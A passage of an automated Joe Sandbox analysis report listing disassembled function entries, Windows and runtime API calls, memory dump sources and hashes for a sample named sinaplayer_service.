                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$InfoLocale__crt_calloc_crt_malloc_crt$___free_lconv_nummalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2413701623-0
                                                                                                                                                                                                    • Opcode ID: a5f5526e4d0559ee57dbb13afc54adfd5ddbbe7c4c4d20b4ccd84dadcadbf5ee
                                                                                                                                                                                                    • Instruction ID: c0fe4d095e121dc4a02a472fee465f25ba3dd96c5b8c8a8e592537d3bd009553
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5f5526e4d0559ee57dbb13afc54adfd5ddbbe7c4c4d20b4ccd84dadcadbf5ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4961EF72A00205EFDB20CF69CC81B9A7BF4EB45354F14456AE958EBB90E770DD81CBA0
                                                                                                                                                                                                    Function 6C56ED6E Relevance: 13.7, APIs: 9, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 467780811-0
                                                                                                                                                                                                    • Opcode ID: 756f9a4d1c95a05374728af732d019ad3b500af89c7501936d51ab0b3dd8420a
                                                                                                                                                                                                    • Instruction ID: 4810beda6f51d44bde2353cf072296e731505cd807265a02079e003d0f382259
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 756f9a4d1c95a05374728af732d019ad3b500af89c7501936d51ab0b3dd8420a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40512631402A1AEBC700CBAACC50B69B7B0BF56728F64835ED43587EE0E774D856CB81
                                                                                                                                                                                                    Function 00380560 Relevance: 13.7, APIs: 9, Instructions: 159COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 003805AA
                                                                                                                                                                                                    • ?AppendRelativePath@FilePath@base@@QBE_NABV12@PAV12@@Z.BASE(00000000,?), ref: 003805BE
                                                                                                                                                                                                    • ?AsUTF8Unsafe@FilePath@base@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.BASE(?), ref: 003805D2
                                                                                                                                                                                                    • ?ReplaceSubstringsAfterOffset@@YAXPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IABV12@1@Z.BASE(?,00000000,00000000,00000000,0039E4E0,00000001,0039E4DC,00000001), ref: 00380634
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00380646
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038066D
                                                                                                                                                                                                    • ?DirectoryExists@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 00380676
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038072E
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380752
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@$D@2@@std@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$AfterAppendDirectoryExists@base@@Offset@@Path@Path@1@@RelativeReplaceSubstringsUnsafe@V12@V12@1@V12@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 983993002-0
                                                                                                                                                                                                    • Opcode ID: 5f52c492bf3196bf6a45bae468f7aaf2838c0b79d4dc996d3764e82abddfbee0
                                                                                                                                                                                                    • Instruction ID: 17a7e4ded1d19ef13933d8269392d02a166c1138a64a472c98e0ace53a16fe94
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f52c492bf3196bf6a45bae468f7aaf2838c0b79d4dc996d3764e82abddfbee0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B516E71D00348EBEF22DBA4CC46BDEBBB4AB16314F140199E9157B2C1E7B56A48CB91
                                                                                                                                                                                                    Function 003987F0 Relevance: 13.6, APIs: 9, Instructions: 107COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00398420: ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,6C6C2BA0,00000000,00000000), ref: 0039846E
                                                                                                                                                                                                      • Part of subcall function 00398420: ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0039849B
                                                                                                                                                                                                      • Part of subcall function 00398420: ??2@YAPAXI@Z.MSVCR120(0000001C), ref: 003984C5
                                                                                                                                                                                                      • Part of subcall function 00398420: ??0MemoryMappedFile@base@@QAE@XZ.BASE ref: 003984DD
                                                                                                                                                                                                      • Part of subcall function 00398420: ?Initialize@MemoryMappedFile@base@@QAE_NABVFilePath@2@@Z.BASE(?), ref: 003984FC
                                                                                                                                                                                                      • Part of subcall function 00398420: ??1MemoryMappedFile@base@@QAE@XZ.BASE(?,?), ref: 00398531
                                                                                                                                                                                                      • Part of subcall function 00398420: ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398538
                                                                                                                                                                                                      • Part of subcall function 00398420: ?Read@JSONReader@base@@SAPAVValue@2@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@Z.BASE(?), ref: 003985A6
                                                                                                                                                                                                    • ?SysWideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?,8285FFAB,00000000), ref: 00398864
                                                                                                                                                                                                    • ??0Version@base@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(00000000), ref: 00398875
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00398888
                                                                                                                                                                                                    • ?SysWideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?), ref: 003988AA
                                                                                                                                                                                                    • ?IsOlderThan@Version@base@@QBE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(00000000), ref: 003988BB
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003988D0
                                                                                                                                                                                                    • ??1Version@base@@QAE@XZ.BASE ref: 003988F9
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,8285FFAB,00000000), ref: 00398908
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,8285FFAB,00000000), ref: 0039892D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$FileFile@base@@MappedMemoryVersion@base@@$D@2@@std@@D@2@@std@@@F8@base@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@3@@W@std@@Wide$??2@BasicD@2@@std@@@2@@Exists@base@@Initialize@OlderPathPath@1@@Path@2@@Path@base@@Piece@Read@Reader@base@@StringThan@Value@2@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2034869197-0
                                                                                                                                                                                                    • Opcode ID: 7444d59b21be086475a0be991fe36713ccd47cec1cc9ef1a4acb8898179183db
                                                                                                                                                                                                    • Instruction ID: 8d34e66ed90d2b0f4b69bb47cfb3431358fd8ff0004d73365eea29dfaedc9f37
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7444d59b21be086475a0be991fe36713ccd47cec1cc9ef1a4acb8898179183db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99415DB1C14248DFDF12DFE4D845BDEBBB8AF16304F14416AD405B7251EB366A08CBA5
                                                                                                                                                                                                    Function 6C5C2F46 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2F52
                                                                                                                                                                                                    • free.MSVCR120(-00000004,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2F5E
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2F6C
                                                                                                                                                                                                    • free.MSVCR120(-00000004,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2F78
                                                                                                                                                                                                      • Part of subcall function 6C55ECE0: HeapFree.KERNEL32(00000000,00000000,?,6C5A3D3A,00000000,6C561782,6C5CB407,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C55ECF4
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2F8D
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2FAA
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2FBB
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2FC1
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2FD1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FlushInterlockedList$FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4002485106-0
                                                                                                                                                                                                    • Opcode ID: 689fd1fbe68472eba47b8e40579fca84cfde43d5849c521f423f53a9ce89f8c2
                                                                                                                                                                                                    • Instruction ID: 961e4b13f018cebf48dc6c04c9183b2696b1798d3a4e2962d1956f37ef1ac78e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 689fd1fbe68472eba47b8e40579fca84cfde43d5849c521f423f53a9ce89f8c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211C132A40626DFC726DFA5CD8784AF3A4BF493A4355196EE88067E00DB60EC648AD1
                                                                                                                                                                                                    Function 6C56EE42 Relevance: 13.6, APIs: 9, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 6C56EE72
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C56EE7C
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6C56EE83
                                                                                                                                                                                                      • Part of subcall function 6C56E4A7: __doserrno.MSVCR120(00000000,?,6C5AEE56,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C56E4AB
                                                                                                                                                                                                      • Part of subcall function 6C56E4A7: _errno.MSVCR120(00000000,?,6C5AEE56,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C56E4BE
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C56EE89
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6C5A42A2
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A42AA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A42B4
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6C5A42C0
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A42CB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__doserrno$AttributesErrorFileLast__dosmaperr_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2636503730-0
                                                                                                                                                                                                    • Opcode ID: 201716483f990e3de1c790e7b5c390dbccd870f99b60a6efc28e0b212a74fc2e
                                                                                                                                                                                                    • Instruction ID: 44375a87e7b91046daae9cb747390be2087d4fc84a5f130c48669fdc3892fe44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201716483f990e3de1c790e7b5c390dbccd870f99b60a6efc28e0b212a74fc2e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C311C230606208DBDB109BFBDC457DE7BA49F46329F000949E9159BEA0DBB8CD448BA5
                                                                                                                                                                                                    Function 00389380 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 302COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: mapped to net::ERR_FAILED$Unknown error $network_change\net_errors_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 0-399661578
                                                                                                                                                                                                    • Opcode ID: c31311b7961356cc6b78236e96b040c147c198b20e6dfb5da25399362e973393
                                                                                                                                                                                                    • Instruction ID: b4a700f38857c71a77fe8f93f4e1cfe47c6b9917a58d4b5f55885448915b1207
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c31311b7961356cc6b78236e96b040c147c198b20e6dfb5da25399362e973393
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84912F73A486488FD725DFACB8427A8F3A4E745631F1447ABEC2D93BD0EB3759108684
                                                                                                                                                                                                    Function 00386290 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,6C6C52C0,?,00385E65,00000000,00000000,00000000,000000FF,00000000,?,?,0038623B,?,00000000), ref: 003862CD
                                                                                                                                                                                                    • memmove.MSVCR120(00000000,00000000,?,?,?,6C6C52C0,?,00385E65,00000000,00000000,00000000,000000FF,00000000,?,?,0038623B), ref: 00386327
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?,?,?,6C6C52C0,?,00385E65,00000000,00000000,00000000,000000FF,00000000,?,?,0038623B), ref: 00386365
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,?,?,?,6C6C52C0,?,00385E65,00000000,00000000,00000000,000000FF,00000000,?,?,0038623B), ref: 00386390
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,6C6C52C0,?,00385E65,00000000,00000000,00000000,000000FF,00000000,?,?,0038623B,?,00000000), ref: 003863B0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memmove$Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 2530380750-4289949731
                                                                                                                                                                                                    • Opcode ID: 978c7308259ed9d7c3f4f74ef7681bfca909d1d22cf3318217ebd6fc8378bd72
                                                                                                                                                                                                    • Instruction ID: f55fae9c2c3e24c7cafc06fcfef06f37e22417e6170d6c445e91d098629c0c4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 978c7308259ed9d7c3f4f74ef7681bfca909d1d22cf3318217ebd6fc8378bd72
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5531D5753103049BCF26EF18D98695FB3BAFF85700724495DE452CB2A6DBB0ED408B90
                                                                                                                                                                                                    Function 0038FA70 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,0039013A,?,00000008,00000000,?,00000000,?,?,?,?,0039013A,?,?), ref: 0038FA90
                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,0039013A,00000004,00000000,?,?,?,0039013A,?,?,?,?,?,8285FFAB,00000000), ref: 0038FAA6
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(verifier.dll), ref: 0038FAC2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VerifierEnumerateResource), ref: 0038FAD8
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038FB2E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MemoryProcessRead$??3@AddressLibraryLoadProc
                                                                                                                                                                                                    • String ID: VerifierEnumerateResource$verifier.dll
                                                                                                                                                                                                    • API String ID: 239842728-3762872906
                                                                                                                                                                                                    • Opcode ID: 61d43c99bf590f65f89f33a5a5c36175524c909ca1fc28272e61a00a42d802ef
                                                                                                                                                                                                    • Instruction ID: cb13cf12de2b045ff37b1af0fc1231e741b074a8dd28ff614d055d2f17b2e27d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61d43c99bf590f65f89f33a5a5c36175524c909ca1fc28272e61a00a42d802ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28418C72600205AFDB02EF54C891FA6B7A8EF45310F2580E5E904DF292DB72E952CBA0
                                                                                                                                                                                                    Function 0037E1C0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 115COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,003764FB,00000000,?,?,?,?,?,00379620,?,0039E338), ref: 0037E226
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,6C6C52C0,?,?,?,003764FB,00000000,?,?,?,?,?,00379620,?,0039E338), ref: 0037E23E
                                                                                                                                                                                                    • memmove.MSVCR120(00379620,00379620,E8FFFFFF,?,00000000,6C6C52C0,?,?,?,003764FB,00000000,?,?,?), ref: 0037E298
                                                                                                                                                                                                    • memcpy.MSVCR120(E8FFFFFF,?,E8FFFFFF,?,00000000,6C6C52C0,?,?,?,003764FB,00000000,?,?,?), ref: 0037E2BD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@Xout_of_range@std@@memcpymemmove
                                                                                                                                                                                                    • String ID: 89$invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 1110030134-3118988713
                                                                                                                                                                                                    • Opcode ID: 4acfa8d76a08b31ab98d49d50307a6a0a9f8f2cc458c106b10ad98fb3b81b36f
                                                                                                                                                                                                    • Instruction ID: a377d3e8ee93cf7eceb01a60d66384180cf4339bc6676fef1b046e7310871881
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4acfa8d76a08b31ab98d49d50307a6a0a9f8f2cc458c106b10ad98fb3b81b36f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E31D3313002199BCB32EE58CC84D5AB7AEFF89740710896EE809CB252DB34E911CB90
                                                                                                                                                                                                    Function 0037C4A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 111timewindowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?FromSeconds@TimeDelta@base@@SA?AV12@_J@Z.BASE(?,00000003,?,?,Function_0000B110,?,?,00000003,?,8285FFAB), ref: 0037C569
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE ref: 0037C57D
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(UploadMgr::StatTimeout,upload_mgr.cpp,00000113,00000000), ref: 0037C596
                                                                                                                                                                                                    • ?PostDelayedTask@MessageLoop@base@@QAEXABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@VTimeDelta@2@@Z.BASE(?,00000000,?,?), ref: 0037C5BC
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 0037C5CC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
